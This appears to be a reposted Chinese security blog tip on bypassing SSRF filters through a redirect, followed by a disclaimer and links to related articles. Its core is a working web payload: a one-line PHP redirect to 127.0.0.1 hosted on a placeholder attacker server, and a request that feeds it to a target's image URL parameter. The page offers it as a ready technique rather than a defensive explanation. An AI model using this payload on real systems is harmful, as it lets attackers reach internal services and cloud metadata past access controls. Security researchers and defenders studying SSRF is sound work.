重定向 SSRF 绕过

2022年3月17日01:40:07评论91 views字数 169阅读0分33秒阅读模式

重定向 SSRF 绕过

如果本地主机和元数据调用受到限制，将此Payload保存为攻击者服务器中。

<?php header('location: http://127.0.0.1');?>

http://target.com/image?url=http://attaker/1.php

原文始发于微信公众号（Khan安全攻防实验室）：重定向 SSRF 绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

今年最新的影响6万WordPress的管理员用户创建漏洞复现（CVE-2025-2266）

AI安全之提示词绕过

一行代码引发的灾难：PHP文件包含漏洞全面剖析与防御

运送违规物资：php反序列化

Src实战

Cloudflare Xss Bypass Tips

利用 PDF 文件实现盲 SSRF

AMAZE_1

HTB_TheFrizz

漏洞挖掘—简单的任意用户密码重置（通杀）

本文由 admin 发表于 2022年3月17日01:40:07
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
重定向 SSRF 绕过https://cn-sec.com/archives/830359.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

8888